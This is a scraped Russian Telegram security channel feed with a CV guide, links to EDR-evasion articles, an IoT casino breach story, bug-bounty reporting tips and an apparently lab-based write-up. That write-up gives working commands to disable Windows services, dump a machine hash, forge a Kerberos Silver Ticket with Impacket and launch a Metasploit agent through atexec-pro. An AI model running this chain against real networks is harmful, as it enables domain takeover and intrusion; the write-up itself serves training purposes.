Похек
16.8K subscribers
2.12K photos
111 videos
243 files
3.09K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @szybnev или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
HRы дуреют с этой прикормки: Ультимативный гайд по составлению резюме для кибербезопасников
#собес #офер #резюме #гайд

Сколько в мире людей, столько и мнений касательно того, что, как и где стоит указывать в своем резюме. Но никто не будет спорить с объективной реальностью, в которой этот инструмент необходим для того, чтобы найти себе работу. Так вот, настало время почитать не просто очередное мнение очередного советчика, а улицезреть действительно ультимативный гайд на то, как создать идеальное резюме, которое само будет продавать вас задорого. В целом, всё нижеописанное можно применить практически к любой IT-профессии, но больше всего тут будет подробностей именно для тех, кто варится в рынке кибербезопасности.

Все вы уже наверняка наслышаны о том, что рекрутеры тратят на отсмотр одного резюме порядка 0,0000003 миллисекунды, но понимаете ли вы, что с этой информацией делать? А знаете ли вы, какой путь проходит ваше резюме с того момента, как вы его публикуете/отправляете до его преобразования с заветный оффер? Существует ли накрутка опыта в ИБ? Почему даже гениальный безопасник может остаться без внимания из-за плохого резюме? Кто и как смотрит ваше резюме, на что обращает внимание, и как вам с этим всем вообще жить? Вопросов можно наплодить еще очень много, так что погнали разбираться, как сделать из вашего резюме не просто красивый PDF, а полноценный инструмент продажи вашего опыта.

➡️Читать далее

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
Please open Telegram to view this post
VIEW IN TELEGRAM
1😁22👍7🔥21🌚1
Тихий вызов. Маскируем вызовы NTAPI от средств защиты
#xakep #EDR #NTAPI #WinAPI

Спасибо автору, наконец-то что-то годное вышло)

Все чаще системы EDR стали прибегать к такой могучей технике, как трассировка стека вызовов, чтобы обнаруживать деятельность зловредных приложений и портить жизнь редтимерам. В этой статье я расскажу, как работает этот метод, а потом попробуем сыграть в прятки с EDR и вызвать NTAPI так, чтобы даже раскрутка стека не обнаружила подвоха.

➡️Читать далее

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
Please open Telegram to view this post
VIEW IN TELEGRAM
2😁12🌚1
Привет, похекеры!👋 По просьбам трудящихся 1. Сегодня у нас история о том, как обычный аквариум превратился в джекпот для киберпреступников. Готовы? Поехали!
#IoTSecurity #Casino #CyberSecurity #SmartDevices #IoT #Казино

➡️ Рыбки, термометр и база данных
В 2017 году неназванное казино в Северной Америке стало жертвой необычной кибератаки. Хакеры проникли в сеть казино через... умный термометр в аквариуме, установленном в лобби. Да-да, вы не ослышались – обычный термометр для рыбок стал ключом к базе данных VIP-клиентов.

➡️Как это работало?
▪️Термометр был подключен к интернету для удаленного мониторинга температуры воды.
▪️Хакеры обнаружили уязвимость в прошивке устройства.
▪️Используя эту уязвимость, они получили доступ к внутренней сети казино.
▪️Найдя базу данных хайроллеров, злоумышленники выгрузили около 10 гигабайт данных.
▪️Информация была передана через тот же термометр на удаленный сервер в Финляндии.

➡️Почему это сработало?
▪️IoT-устройства часто имеют слабую защиту. Почему? Потому что если бы устройство за 5$ имело бы стойкую защиту, оно бы стоило 50$
▪️Производители фокусируются на функциональности, а не на безопасности. Потому что дешевле не запариваться над безопасностью)
▪️Традиционные системы защиты не всегда покрывают IoT-девайсы.

➡️Последствия
Казино потеряло конфиденциальную информацию о своих самых ценных клиентах. А учитывая, что такие клиенты особенно пекутся о конфенданциальности своих походах, то я думаю они не были рады)

➡️Рекомендации
▪️Подключайте к сети только необходимые устройства или грамотно сегментируйте сеть. Термометру, датчику движения или любой другой штуке не нужен доступ к базе данных или кассовому оборудованию.
▪️Смена дефолтных паролей.
▪️Обновление прошивок, даже для "неважных" устройств.

p.s. кто заметил отсылку?)

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
Please open Telegram to view this post
VIEW IN TELEGRAM
2👍20❤‍🔥5😁3
mindmap_ad_dark_classic_2025.03.svg
3.3 MB
Orange Security обновили свой roadmap по пентесту Active Directory

Для тех кто не в теме, это самый популярный roadmap по пентесту AD в интернете!

https://orange-cyberdefense.github.io/ocd-mindmaps/img/mindmap_ad_dark_classic_2025.03.excalidraw.svg

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥18👍72❤‍🔥1
Кривая дорожка. Обфусцируем вызовы WinAPI новыми способами
#xakep #EDR #WinAPI #обфускация

😊 Снова хорошая хардкорная статья)

Все крутые вредоносы стараются прятать использование вызовов WinAPI, ведь наличие подозрительных функций в коде может привести к блокировке исполнения нашей программы. Существует не так много документированных способов скрыть вызовы WinAPI, однако у меня есть пара любопытных разработок, и я готов ими поделиться. Мы попрактикуемся в сканировании памяти, исследовании компонентов Windows и даже немного затронем RPC.

🔓 Читать далее 🔓

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
Please open Telegram to view this post
VIEW IN TELEGRAM
1❤‍🔥82
Поздравляю наших милых, самых прекрасных, вдохновляющих и к сожалению малочисленных дам)

Надеюсь с каждым годом получиться поздравлять все больше девушек в нашей сфере 😊

Желаю вам оставаться такими же прекрасными и опасными, как розы, а также женственными)

❤️❤️❤️
Please open Telegram to view this post
VIEW IN TELEGRAM
6❤‍🔥3425👍2🔥1
Все девочки уже получили какой-нибудь подарок?)
Final Results
45%
Да
55%
А как так нет?
110😁2❤‍🔥1
Forwarded from Purple Chronicles (Feyd-Rautha Harkonnen)
💻Remote NTLM Relay preparation: Lateral Movement without NTLM and 445/TCP💻
В ходе решения одной из сетей на известной платформе может сложиться ситуация, с которой столкнулся я.
Имея привилегированный доступ к серверу, который впоследствии будет использоваться для Remote NTLM Relay, я без задней мысли отключил службы NetLogon, LanManServer и LanManWorkstation и перезагрузил машину, забыв закрепиться на ней встроенными средствами фрэймворка постэксплуатации.
Сделал я это следующим образом:
sc stop netlogon
sc stop lanmanserver
sc config lanmanserver start= disabled
sc stop lanmanworkstation
sc config lanmanworkstation start= disabled

После перезагрузки хоста я удостоверился, что порт 445 не прослушивается сервером (nmap -p 445 -sT -Pn <serverIP>), после чего решил продолжить атаку, но столкнулся с очевидной проблемой: я не могу пройти аутентификацию на сервере и, следовательно, запустить бинарный файл, необходимый для организации портфорвардинга.

Имеем 2 проблемы:
1) Не работают службы NetLogon, LanManServer и LanManWorkstation, из-за чего не получится пройти аутентификацию на целевом сервере при помощи NTLM;
2) Не работает SMB-порт, необходимый для работы большинства утилит из набора Impacket.

Что же делать?
Решение довольно очевидное. Вместо NTLM можно использовать Kerberos, так как мы находимся в доменной инфраструктуре. Не зря же после получения системного доступа к атакуемому серверу мы дампили его LSA-секреты?
А вместо стандартных скриптов из набора Impacket можно использовать их "pro вариации", которые не требуют доступа к 445 порту целевого сервера.

Начнем атаку!
Шаг 1. Silver Ticket🎫
Первый шаг показан в демонстративных целях, чтобы видеть хэш пароля учетной записи атакуемого сервера. Напомню, что его мы получили ранее путем дампа LSA-секретов на самом сервере.
proxychains impacket-secretsdump holo.live/Administrator@10.201.126.30 -hashes :<redacted> -just-dc-user 'PC-FILESRV01$'

...
PC-FILESRV01$:1120:aad3b435b51404eeaad3b435b51404ee:e66f5cf1a026516d1d2220130d8d13c4


Для осуществления атаки нам необходим SID домена, который мы получим с использованием скрипта impacket-lookupsid из набора Impacket (в данном случае используем технику Pass-the-Hash в отношении контроллера домена):
proxychains impacket-lookupsid HOLO.LIVE/'PC-FILESRV01$'@10.201.126.30 -hashes :e66f5cf1a026516d1d2220130d8d13c4

Получаем SID домена: S-1-5-21-471847105-3603022926-1728018720


После получения SID начинаем крафтить Silver Ticket, чтобы получить привилегированный доступ к целевому серверу. Путь до полученного тикета записываем в переменную окружения KRB5CCNAME:
proxychains impacket-ticketer -nthash e66f5cf1a026516d1d2220130d8d13c4 -domain-sid S-1-5-21-471847105-3603022926-1728018720 -dc-ip 10.201.126.30 -domain holo.live -spn HOST/PC-FILESRV01.holo.live 'watamet'

export KRB5CCNAME=watamet.ccache


Шаг 2. ATExec Pro🤩
После этого уже при помощи известного нам atexec-pro.py и полученного билета получаем доступ к целевому серверу и запускаем наш C2-агент (для примера здесь используется MSF):
proxychains python3 atexec-pro.py PC-FILESRV01.holo.live -k -no-pass -dc-ip 10.201.126.30

Внутри шелла:
ATShell (@PC-FILESRV01.holo.live)> upload /root/THM/Holo/binaries/msf_win_x64.exe C:\Windows\Tasks\msf.exe
ATShell (@PC-FILESRV01.holo.live)> C:\Windows\Tasks\msf.exe


Поэтапно те же действия можно видеть на приложенных скриншотах.
1) Получение SID домена при помощи impacket-lookupsid;
2) Создание Silvet Ticket при помощи impacket-ticketer для привилегированного доступа к целевому хосту;
3) Получение доступа к целевому хосту при помощи atexec-pro.py с использованием ранее полученного билета (обращаю внимание на лог ProxyChains, где отсутствует коннект до 445 порта).
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥2154❤‍🔥2👍2👾1
Хотите советы для багхантеров?
Anonymous Poll
72%
😮
28%
😏
🌚19
🪲 Советы для багхантеров от команды BI.ZONE Bug Bounty 🪲

1️⃣Как можно подробнее описывайте шаги в отчете
Отчет с одним скрином и отсутствием пояснений становится головоломкой, которую нужно разгадывать. Постарайтесь описывать все действия для воспроизведения уязвимости вместе с ссылками и желательно видео PoC. Это ускорит рассмотрение отчета и облегчит жизнь триажера, а вам +rep.


2️⃣Дублируйте текстом запросы из скриншотов
Да, для считывания текста с картинок есть нейросети, но мы использовать их не можем. Нам остается лишь пытаться воспроизвести запрос вручную, а это крайне занудная задача. Если же триажеру для получения запроса придется лишь поменять пару полей, отчет примут быстрее, а уважение к вам возрастет.


3️⃣Правильно выбирайте задачи и адекватно выставляйте критичность
Правильно выбранная задача из списка в программе ускорит поиск дублей, что заметно сократит время рассмотрения отчета. Адекватное выставление критичности убережет вендора от необходимости поднимать специалистов в субботу вечером из-за XSS с уровнем critical на лендинге.


С кайфом, команда BI.ZONE Bug Bounty 💙 x Похек 🌚
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🌚14👍11🔥4😁2👾2
🏦 Советы для багхантеров от команды T-Bank BugBounty 🏦

1️⃣Упражнение "Представь себя триажером"
Попробуй абстрагироваться от своего отчета и посмотреть на него свежим взглядом. Все ли понятно из прочитанного? Хочется ли что-то уточнить по тексту?


2️⃣Упражнение "Флешбек"
Открой свой рандомный отчет годичной давности. За год подробности могли забыться, хороший способ проверить себя - это прочитать старый отчет и, не заглядывая в комменты, попытаться воспроизвести/понять импакт/в целом суть


3️⃣Упражнение "Аналитик данных"
Посмотри все свои отчеты и комментарии триажеров к ним. Если разные триажеры на разные отчеты задают похожие вопросы или в каждом возникает спор - возможно стоит как-то поменять паттерн написания отчетов


С любовью, команда T-Bank BugBounty 💛 x Похек 🌚
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
😁18🔥14🌚6❤‍🔥52👍1👾1
🔹 Советы для багхантеров от команды VK Bug Bounty 🔹

1️⃣ Культура подачи отчетов: ключ к быстрому триажу
Соблюдение культуры подачи отчетов критически важно для эффективного взаимодействия. Хотя принимаются отчеты любого формата, информативность и детальность значительно ускоряют процесс триажа. Добавление алгоритма воспроизведения, RAW-HTTP запросов, скринкаста и скриншотов не только ускоряет рассмотрение уязвимости,
но и плюсик в карму.


2️⃣Оценка угрозы: понимание потенциального вознаграждения
При обнаружении уязвимости важно проверить в скоупе ли она, а потом оценить ее потенциальный импакт. Анализируйте легкость эксплуатации, затронутый сервис и домен. Такой подход помогает прогнозировать уровень вознаграждения и приоритетность уязвимости для компании.


3️⃣Глубокое понимание архитектуры: путь к критическим уязвимостям
Посвятите время на изучение архитектуры приложения, логики его работы и типичных уязвимостей в аналогичных системах - это стратегический подход к багхантингу. Понимание нормального функционирования приложения позволяет легче выявлять аномалии и потенциальные уязвимости, особенно критические. Этот метод повышает эффективность поиска и увеличивает шансы на обнаружение значимых проблем безопасности.


С уважением, команда
VK Bug Bounty 🔹 x Похек 🌚
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
3😁20❤‍🔥9🔥7🌚32👍1